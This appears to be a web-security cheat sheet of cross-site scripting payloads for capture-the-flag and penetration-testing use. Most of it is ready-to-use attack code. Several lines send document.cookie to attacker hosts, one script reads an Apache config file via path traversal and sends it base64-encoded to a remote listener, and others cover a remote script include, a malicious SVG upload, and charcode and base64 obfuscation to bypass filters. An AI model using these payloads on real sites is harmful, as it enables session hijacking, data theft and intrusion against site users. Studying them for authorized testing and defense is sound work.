XSS

Cross-site Scripting

Detection & Testing

Test for outbound connections

Setup HTTP Server:

python3 -m http.server 80

Submit Payload:

<img src='http://IP/test.jpg' />

if you receive a request, external resources are allowed
Check also Out-Of-Band Verification

Basic Code Execution Tests

<script>alert('XSS')</script>

<script>alert('Boo!');</script>

Use it to call remote scripts

<script src="https://cdn.jsdelivr.net/gh/b4ndit23/WebAcademy-Resources@main/xss-payload.js "></script>

Use it inside an input field or an attribute

"><script>alert(1)</script>

Use it to call for external resources

<script>fetch('[host]')</script>

<img src=x onerror="alert('Boo!')">

Use it to retrieve cookies to an external resource

<img src=x onerror="fetch('[HOST]' + document.cookie)" />

Inject into an existing script block

fetch('http://10.10.14.91:8000/?cookie=' + document.cookie);

Stored XSS via SVG Upload

Create a malicious SVG file to test image uploading features:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("Hello World");
  </script>
</svg>

Arbitrary File Upload

First, create the file that you are going to use to load the malicious javascript:

Load the file

<script src="http://REMOTE-SERVER:PORT/tokyo.js"></script>

Then, create the script:

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.5:3000/?content=' + btoa(req.responseText),
true);
req2.send();

Filter Bypasses

Charcode Bypass

Python Script to Generate Charcode:

python3 -c "print(','.join([str(ord(c)) for c in '''document.write('<script src=\"http://10.10.16.8/tokyo.js\"></script>');''']))"

Now make the payload:

<img src="x/><script>eval(String.fromCharCode(CHARCODE_HERE));</script>">

Base64 Encoding Bypass

<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>

Cross-Site Scripting (XSS) Cheat Sheet - 2026 Edition | Web Security AcademyWebSecAcademy

Last updated 1 month ago